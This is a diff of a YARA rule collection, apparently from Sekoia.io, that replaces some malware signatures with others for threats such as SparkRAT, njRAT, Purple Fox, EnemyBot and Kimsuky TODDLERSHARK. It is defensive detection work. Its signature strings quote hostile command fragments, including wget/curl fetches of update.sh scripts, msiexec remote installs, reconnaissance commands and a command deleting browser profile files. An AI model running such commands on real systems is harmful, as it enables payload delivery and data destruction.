+		$s5 = "common.(*SocksServer).Start."
+		$s6 = "client.(*TunnelControlMessage).GetConnectionId"
+		$s7 = "protobuf/reflect/protoreflect.ProtoMessage"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 ) and filesize < 100KB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe ) and #repo > 200 or 5 of ( $s* )
 }
-
-rule SEKOIA_Merlin_Win_Exe : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Obfuscated : FILE
 {
 	meta:
-		description = "Detects Merling agent (PE)"
+		description = "Detects obfuscated version of PowerShower"
 		author = "Sekoia.io"
-		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be4"
-		date = "2022-01-03"
+		id = "f76ab9d8-7753-4a17-aedd-fc9c3b8cd322"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/merlin_win_exe.yar#L4-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6a42e9ea9749dc894788d80cd4395da026ef3c49eab1de6802e09f8b1751f5bd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_powershower_obfuscated.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fdb1edb3982eb5356cdf5fd1fa9fcc41d5048848b2a05589e87836ac0b05ec7a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244890,26 +245517,25 @@ rule SEKOIA_Merlin_Win_Exe : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "B.symtab" ascii
-		$s2 = "github.com/Ne0nd0g/merlin" ascii
-		$s3 = "github.com/lucas-clemente" ascii
-		$s4 = "SendMerlinMessage" ascii
+		$s1 = "{0}{1}{2}{3}{4}{5}{6}{7}{8}" ascii wide
+		$s2 = "{000}{001}{002}{003}{004}{005}{006}{007}{008}" ascii wide
+		$s3 = "::Unicode.GetString([System.Convert]::FromBase64String(" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "07b5472d347d42780469fb2654b7fc54" ) and all of them and $s1 at 591 and filesize < 15MB
+		($s1 in ( 0 .. 100 ) or $s2 in ( 0 .. 100 ) ) and $s3 in ( filesize -200 .. filesize )
 }
-rule SEKOIA_Apt_Granitetyphoon_Pingpulllinux_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detects PingPull Linux variant"
+		description = "Detect LNK used by BadMagic to execute MSI payloads."
 		author = "Sekoia.io"
-		id = "ee213206-d9ad-47fa-bea1-61a9d2cfba58"
-		date = "2023-05-25"
+		id = "731bd51d-c4e4-4efb-9fa8-f981a8555ed3"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_granitetyphoon_pingpulllinux_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "89c89bb24d1996c04fba0e6ebfd2aaf1544d8a9e6333b896c1855747fb979308"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_malicious_lnk.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b83749c71cefb485f8bbea1d465fc477de159e086efa04ebce4d0778a203ed89"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244917,125 +245543,146 @@ rule SEKOIA_Apt_Granitetyphoon_Pingpulllinux_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "chkconfig --add %s"
-		$ = "chkconfig %s on"
-		$ = "update-rc.d %s enable"
-		$ = "service %s start"
-		$ = "respawn limit 10 10"
-		$ = "POST /%s HTTP/1.1"
-		$ = "PROJECT_%s_%s_%08X"
-		$ = "Description=The HTTP(S) Client"
-		$ = "exec %s -f"
+		$ = "/i http" wide
+		$ = ".msi /quiet" wide
+		$ = "%WINDIR%\\System32\\msiexec.exe"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 11MB and 7 of them
+		uint32be( 0 ) == 0x4c000000 and filesize < 1KB and all of them
 }
-rule SEKOIA_Apt_Turla_Comlook : FILE
+rule SEKOIA_Backdoor_Mul_Sparkrat : FILE
 {
 	meta:
-		description = "Detects Class and Method names used inside ComLook"
+		description = "Detect SparkRAT using string found in the source code"
 		author = "Sekoia.io"
-		id = "c3bf886b-f952-47f9-aff6-3cd74c27077d"
-		date = "2023-10-30"
+		id = "cd818207-f8ec-41fa-abef-c29d481c7897"
+		date = "2023-01-30"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_turla_comlook.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "882a2efda4c3888c34a2802797c9eac4ab8b96774f2eea19e586ff9c8adb9292"
+		reference = "https://github.com/XZB-1248/Spark"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_mul_sparkrat.yar#L1-L59"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "377fc647e9a7ee6d5ad69370d5a2264302215401417951432f904c25e26169b9"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ClassName1 = "AgentConfig"
-		$ClassName2 = "CommandPerforming"
-		$MethodName1 = "CmdCommand"
-		$MethodName2 = "GetConfigCommand"
-		$MethodName3 = "GetFileCommand"
-		$MethodName4 = "PutFileCommand"
-		$MethodName5 = "SetConfigCommand"
-		$MethodName6 = "AgentProtocol"
-		$Log1 = "CONFIG_SERVERS_LIST_PARSING_ERROR" ascii wide
-		$Log2 = "GET_UIDS_TO_CHECK_PARSING_ERROR" ascii wide
-		$Log3 = "PAYLOAD_PARSING_FILEPATH_AND_FILE_ERROR" ascii wide
-		$Log4 = "COMMAND_EMPTY_ERROR" ascii wide
-		$Log5 = "IMAP_USERNAME_FORMAT_INCORRECT" ascii wide
-		$Log6 = "NO_MESSAGES_TO_RETRIEVE" ascii wide
+		$ = "2006/01/02 15:04:05" wide ascii
+		$ = "can not find secret header" wide ascii
+		$ = "${i18n|COMMON.UNKNOWN_ERROR}" wide ascii
+		$ = "/api/client/update" wide ascii
+		$ = "application/octet-stream" wide ascii
+		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
+		$ = "no IP address found" wide ascii
+		$ = "failed to read network io counters" wide ascii
+		$ = "failed to read cpu info" wide ascii
+		$ = "PING" wide ascii
+		$ = "OFFLINE" wide ascii
+		$ = "LOCK" wide ascii
+		$ = "LOGOFF" wide ascii
+		$ = "HIBERNATE" wide ascii
+		$ = "SUSPEND" wide ascii
+		$ = "RESTART" wide ascii
+		$ = "SHUTDOWN" wide ascii
+		$ = "SCREENSHOT" wide ascii
+		$ = "TERMINAL_INIT" wide ascii
+		$ = "TERMINAL_INPUT" wide ascii
+		$ = "TERMINAL_RESIZE" wide ascii
+		$ = "TERMINAL_PING" wide ascii
+		$ = "TERMINAL_KILL" wide ascii
+		$ = "FILES_LIST" wide ascii
+		$ = "FILES_FETCH" wide ascii
+		$ = "FILES_REMOVE" wide ascii
+		$ = "FILES_UPLOAD" wide ascii
+		$ = "FILE_UPLOAD_TEXT" wide ascii
+		$ = "PROCESSES_LIST" wide ascii
+		$ = "PROCESS_KILL" wide ascii
+		$ = "DESKTOP_INIT" wide ascii
+		$ = "DESKTOP_PING" wide ascii
+		$ = "DESKTOP_KILL" wide ascii
+		$ = "DESKTOP_SHOT" wide ascii
+		$ = "COMMAND_EXEC" wide ascii
+		$ = "DEVICE_UPDATE" wide ascii
+		$ = "${i18n|COMMON.INVALID_PARAMETER}" wide ascii
+		$ = "${i18n|EXPLORER.FILE_OR_DIR_NOT_EXIST}" wide ascii
+		$ = "SPARK COMMIT: " wide ascii
+		$ = "${i18n|COMMON.DISCONNECTED}" wide ascii
+		$ = "${i18n|DESKTOP.NO_DISPLAY_FOUND}" wide ascii
+		$ = "/api/bridge/push" wide ascii
+		$ = "${i18n|COMMON.OPERATION_NOT_SUPPORTED}" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of ( $ClassName* ) and any of ( $MethodName* ) and any of ( $Log* )
+		17 of them and filesize > 4MB
 }
-rule SEKOIA_Apt_Unc4990_Explorer_Ps1
+rule SEKOIA_Apt_Kimsuky_Toddlershark_Obfuscated : FILE
 {
 	meta:
-		description = "Detects powershell script (explorer.ps1)"
+		description = "Detects obfuscated version of Kimsuky TODDLERSHARK vbs malware"
 		author = "Sekoia.io"
-		id = "2e1abbbf-f9b7-4147-b7da-3544cbc4a5f1"
-		date = "2024-02-01"
+		id = "9ab82466-4f38-4597-b75b-13252e180c70"
+		date = "2024-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unc4990_explorer_ps1.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5085f738e23b801c7e36408d189755086d91c0bb266af6738c80510eb85e598f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_toddlershark_obfuscated.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5f067ce32e7fee5cf481d82bb98f4ae10bd7187078bc111b08fc58d043954152"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "$(get-location).Path"
-		$s1 = "+ \"\\Runtime Broker.exe"
-		$s2 = "Start-Process -FilePath"
-		$s3 = "-Wait;"
-		$s4 = "Start-Sleep -s"
+		$s1 = { 3a 20 [3-10] 20 3d 20 22 [3-30] 22 3a }
+		$s2 = { 45 78 65 63 75 74 65 28  [3-15] 28 22 }
+		$s3 = { 50 72 69 76 61 74 65 20 46 75 6e 63 74 69 6f 6e 20 [3-15] 28 42 79 56 61 6c 20 [3-15] 29 3a }
+		$s4 = "& Chr(\"&H\" & Mid("
 
 	condition:
-		all of them and @s3- @s2 < 35
+		#s4== 1 and #s3 == 1 and #s2 == 1 and #s1 > 20 and filesize < 1MB
 }
-rule SEKOIA_Apt_Apt37_Chinotto_Powershell_Variant
+rule SEKOIA_Spyware_And_Bahamut
 {
 	meta:
-		description = "Detects APT37 Chinotto Powershell Variant"
+		description = "Detect Bahamut's spyware based on common information gathering function names"
 		author = "Sekoia.io"
-		id = "fa42b225-58fe-4e00-b84b-df37491d8fdd"
-		date = "2023-03-06"
+		id = "d416997e-baf1-412c-bf39-905a6e19b65e"
+		date = "2022-11-23"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt37_chinotto_powershell_variant.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b4d17467f15d52bd615e335fa8bc31381ec273b67dabb74655f47179f04f631f"
+		reference = "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/spyware_and_bahamut.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5f44c938fed9b32eaf183be979a67e0c7fde409e72875359105ad7ffb393893d"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "c51dc2132c830c560aaeae4bf48e5f0d28c84b36d27840b5c2ba170d87f4afa5"
+		hash2 = "d7e2cf642b236dba9ba0cbe5a9dc28baf22477973d5ce163e21ec40f5f26e078"
 
 	strings:
-		$ = "$env:COMPUTERNAME + '-' + $env:USERNAME;" ascii wide
-		$ = "while($true -eq $true)" ascii wide
-		$ = "Start-Sleep -Seconds" ascii wide
-		$ = " -ne 'null' -and $" ascii wide
-		$ = "= 'R=' + [System.Convert]::" ascii wide
-		$ = "[string]$([char]0x0D) + [string]$([char]0x0A);" ascii wide
+		$ = "FbDao"
+		$ = "SignalDao"
+		$ = "conionDao"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SEKOIA_Ransomware_Win_Fonix : FILE
+rule SEKOIA_Rootkit_Win_Purplefox_Svchost_Txt : FILE
 {
 	meta:
-		description = "Detect the Fonix / XINOF ransomware by spotting its specific debug path"
+		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
 		author = "Sekoia.io"
-		id = "b28467d5-69a0-4a8b-8938-8fdac2ae8d19"
-		date = "2021-10-07"
+		id = "e992d574-6a44-4bea-97e2-6d5579ce8d02"
+		date = "2022-03-28"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_fonix.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2085fae62c07f63723a417566c204b0a9942de35ed80272d1486dc2c96ca0037"
+		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rootkit_win_purplefox_svchost_txt.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a1de949cb2e898ed031f5c796f7152af12dfae5431dfaf269f25ebe72f0ae004"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245043,118 +245690,79 @@ rule SEKOIA_Ransomware_Win_Fonix : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Ransomware\\Fonix" ascii
-		$s2 = "Release\\Fonix.pdb" ascii
+		$str0 = "C:\\ProgramData\\dll.dll,luohua" wide
+		$str1 = "C:\\ProgramData\\7z.exe" wide
+		$str2 = "F:\\hidden-master\\x64\\Debug\\QAssist.pdb" ascii
+		$str3 = "F:\\Root\\sources\\MedaiUpdateV8\\Release\\MedaiUpdateV8.pdb" ascii
+		$str4 = "cmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255" ascii
+		$str5 = "del /s /f %appdata%\\Mozilla\\Firefox\\Profiles\\*.db" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		4 of ( $str* ) and filesize > 7000KB and filesize < 9500KB
 }
-rule SEKOIA_Nomercy : FILE
+rule SEKOIA_Apt_Darkpink_Sample : FILE
 {
 	meta:
-		description = "Detect NoMercy sample version up to 1.1.0"
+		description = "Detects two parts of cmd.exe /c "
 		author = "Sekoia.io"
-		id = "2591f74b-8ab8-45ef-ba64-62a93df305c1"
-		date = "2022-07-11"
+		id = "91b4c64a-7622-4f03-bd3f-9fe56f01dfbe"
+		date = "2023-06-05"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/nomercy.yar#L1-L61"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "175bc58f1b34bb60f6cacc15747e944cbbdd58fe287ff46abed969eaa39870db"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_darkpink_sample.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a"
+		logic_hash = "c9d3952036bffe2d924ea553fd53f8b6f0b3f16f1060fbde69496c800d4d5ad9"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		hash1 = "9ecc76d4cda47a93681ddbb67b642c2e1f303ab834160ab94b79b47381e23a65"
-		hash2 = "557acce8b787aba87c8eeb939438b52c5ca953f28ad680a7faeb2b3046d3fda0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$debug1 = "Posted uid and version" wide ascii
-		$debug2 = "Posted cli info to server" wide ascii
-		$debug3 = "Posted other info to server" wide ascii
-		$debug4 = "Sending screenshot..." wide ascii
-		$debug5 = "Sent screenshot" wide ascii
-		$debug6 = "Listening to Microphone..." wide ascii
-		$debug7 = "Collecting other info..." wide ascii
-		$url1 = "/a?uid=" wide ascii
-		$url2 = "/c?uid=" wide ascii
-		$url3 = "/d?uid=" wide ascii
-		$url4 = "/e?uid=" wide ascii
-		$url5 = "/b?sysinfoother=" wide ascii
-		$url6 = "/b?sysinfocli=" wide ascii
-		$info1 = "PUBLIC IP:" wide ascii
-		$info2 = "HWID:" wide ascii
-		$info3 = "RAM:" wide ascii
-		$info4 = "GPU:" wide ascii
-		$info5 = "MEDIA ACCESS CONTROL ADDRESS:" wide ascii
-		$info6 = "PRIVATE IP:" wide ascii
-		$info7 = "OS VERSION:" wide ascii
-		$info8 = "ANTIVIRUS:" wide ascii
-		$info9 = "KEYBOARD LANGUAGE:" wide ascii
-		$info10 = "CLIPBOARD: {0}{1}{2}" wide ascii
-		$info11 = "RUNNING PROCESSES:" wide ascii
-		$info12 = "WINDOW TITLE:" wide ascii
-		$cmd1 = "/c whoami /all" wide ascii
-		$cmd2 = "/c whoami" wide ascii
-		$cmd3 = "/c arp -a" wide ascii
-		$cmd4 = "/c ipconfig /all" wide ascii
-		$cmd5 = "/c net view /all" wide ascii
-		$cmd6 = "/c net share" wide ascii
-		$cmd7 = "/c route print" wide ascii
-		$cmd8 = "/c netstat -nao" wide ascii
-		$cmd9 = "/c net localgroup" wide ascii
-		$cmd10 = "/c systeminfo" wide ascii
-		$inv1 = "http://api.ipify.org" wide ascii
-		$inv2 = "NoMercy" wide ascii
+		$cmd_xor_part_1 = {DF 00 A1 00 E4 00 F0 00 4B 00 3A 00 D1 00 C4 00}
+		$cmd_xor_part_2 = {bc 00 cc 00 80 00 d0 00 64 00 59 00 F1 00 E6 00 FD 00 83 00 C6}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of ( $debug* ) and 8 of ( $info* ) and 2 of ( $url* ) and 6 of ( $cmd* ) and 1 of ( $inv* ) and filesize > 700KB and filesize < 3000KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Bot_Lin_Enemybot_April22 : FILE
+rule SEKOIA_Latrodectus_Br4_Js_Dropper
 {
 	meta:
-		description = "Detect enemybot based on command line observed in strings"
+		description = "Detect the JS script used to drop Latrodectus"
 		author = "Sekoia.io"
-		id = "5778c653-39ce-4f5d-b10b-1503b74e5041"
-		date = "2022-04-14"
+		id = "042a598d-66fa-4994-a793-228355abd5dd"
+		date = "2024-06-25"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/3xp0rtblog/status/137520616938452173://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bot_lin_enemybot_april22.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "18ea06e60259f8d7d639b0e4659f0f5e166e9589d617f5766c06968af5e56aa6"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/latrodectus_br4_js_dropper.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a835bd9a9ad68fd2f285ec5c04a5c78ba5ca85381ff30048ac375bef220fd72f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd0 = "wget http://%s/update.sh" ascii
-		$cmd1 = "busybox wget http://%s/update.sh" ascii
-		$cmd2 = "curl http://%s/update.sh" ascii
-		$cmd3 = "chmod 777 update.sh" ascii
-		$cmd4 = "rm -rf update.sh" ascii
-		$str0 = "ENEMEYBOT" ascii xor
-		$str1 = "KEKSEC" ascii xor
-		$str2 = "/tmp/.pwned" ascii xor
-		$str3 = "echo -e \"\x65\x6e\x65\x6d\x79"
+		$s1 = " installer.InstallProduct(msiPath);" ascii
+		$s2 = "new ActiveXObject(\"WindowsInstaller.Installer\");" ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f or uint32( 0 ) == 0xfeedfacf ) and ( 4 of ( $cmd* ) or 2 of ( $str* ) )
+		all of them
 }
-rule SEKOIA_Apt_Scanbox_Framework_Not_Obfuscated : FILE
+rule SEKOIA_Crimeware_Njrat_Strings : FILE
 {
 	meta:
-		description = "Detects the non obfuscated version of ScanBox"
+		description = "Detects njRAT based on some strings"
 		author = "Sekoia.io"
-		id = "4790f122-89de-4f7b-a25f-9ac7b1af8333"
-		date = "2022-09-01"
+		id = "215807ae-fbcb-478d-8941-e0787b883669"
+		date = "2022-08-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_scanbox_framework_not_obfuscated.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "52779571eb4e68442542a1c4cff58d5b00a264bb567396126cd93dc4ec4eda45"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crimeware_njrat_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "47102adde81682c3c1c856c3495c6f98a9e39aa052eac2ab0a803dab44d19c26"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245162,32 +245770,30 @@ rule SEKOIA_Apt_Scanbox_Framework_Not_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "php?m=a&data="
-		$ = "php?m=p&data="
-		$ = ".fun.split_data = function"
-		$ = ".php?data="
-		$ = ".php?m=b"
-		$ = "basic.apipath"
-		$ = ".info.seed ="
-		$ = "loadjs ="
-		$ = "info.color = screen.colorDepth"
+		$ = "set cdaudio door closed" wide
+		$ = "set cdaudio door open" wide
+		$ = "ping 0" wide
+		$ = "[endof]" wide
+		$ = "TiGeR-Firewall" wide
+		$ = "NetSnifferCs" wide
+		$ = "IPBlocker" wide
+		$ = "Sandboxie Control" wide
 
 	condition:
-		5 of them and filesize < 500KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
 }
-
-rule SEKOIA_Apt_Nobelium_Nativezone_Gen : FILE
+rule SEKOIA_Rat_Win_Borat : FILE
 {
 	meta:
-		description = "Detects NativeZone used in 2022"
+		description = "Detect the Borat RAT besed on specific strings"
 		author = "Sekoia.io"
-		id = "e16cac97-38dd-4145-95f5-cf641940a19b"
-		date = "2022-02-25"
+		id = "9f8badb3-ee8b-45d9-8515-c847351bb1f5"
+		date = "2022-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_nobelium_nativezone_gen.yar#L3-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "63ad9fc510541f98237fa5b254dc4a147539cbf485b2889d97bf3b619c3db3ae"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_borat.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "53d6d9fe6b3218d97079e624379863d927d0b783b24acbda359b18daafb5162e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245195,115 +245801,94 @@ rule SEKOIA_Apt_Nobelium_Nativezone_Gen : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rich = { 52 69 63 68 [4] 00 }
-		$obs = { C7 85 [8] C7 85 }
-		$nobs = { C7 85 [6] 00 00 C7 85 }
+		$str0 = "BoratRatMutex_Sa8XOfH1BudX" ascii
+		$str1 = "BoratRat.exe" ascii
+		$str2 = "BoratRat" ascii
+		$str3 = "CN=BoratRat" wide
+		$str4 = "Sending plugun to " wide
+		$str5 = "Save recorded file fail " wide
+		$str6 = "Sa8XOfH1BudX" wide
+		$str7 = "Alert when process activive." wide
+		$str8 = "disableDefedner" wide
+		$str9 = "bin\\Ransomware.dll" wide
+		$str10 = "disableDefedner" wide
 
 	condition:
-		pe.DLL and filesize < 2500KB and pe.number_of_exports > 20 and pe.number_of_imports < 30 and ( pe.imports ( "kernel32.dll" , "VirtualAlloc" ) and pe.imports ( "kernel32.dll" , "VirtualProtect" ) ) and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( pe.sections [ i ] . name == ".rdata" and pe.sections [ i ] . raw_data_size > 300000 ) and #obs > 300 and #nobs < 150 and not $rich
+		uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SEKOIA_Malware_Win_Mex : FILE
+rule SEKOIA_Apt_Gamaredon_Subtle_Paws : FILE
 {
 	meta:
-		description = "Detect the MEX malware"
+		description = "SUBTLE-PAWS powershell backdoor used by Gamaredon"
 		author = "Sekoia.io"
-		id = "57fe8525-4bab-4078-ac6f-635f0f7963ec"
-		date = "2022-07-28"
+		id = "1950f886-97d2-4aa1-8f13-2947eba706e4"
+		date = "2024-02-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_win_mex.yar#L1-L57"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1335a212d1af0087cd0e0402f3d6c864d1aafd3df3f1e4bb3851c96c3ff403cb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_subtle_paws.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2fcebcf3401912e06ca4a34bf4e8d5318c6b2e08b00c4939ab932f3fb94cbc89"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "MEX: In-memory execution of offensive tradecraft (Version:" wide
-		$ = "Available Options:" wide
-		$ = "-meh <help>" wide
-		$ = "-mep <payload_name_to_use>" wide
-		$ = "-mec <payload_args>" wide
-		$ = "Execution examples:" wide
-		$ = "mex.exe -mep sharphound" wide
-		$ = "mex.exe -mep sharphound -mec -arg1" wide
-		$ = "mex.exe -mep get_version" wide
-		$ = "mex.exe -mep list_plugins" wide
-		$ = "Available plugins:" wide
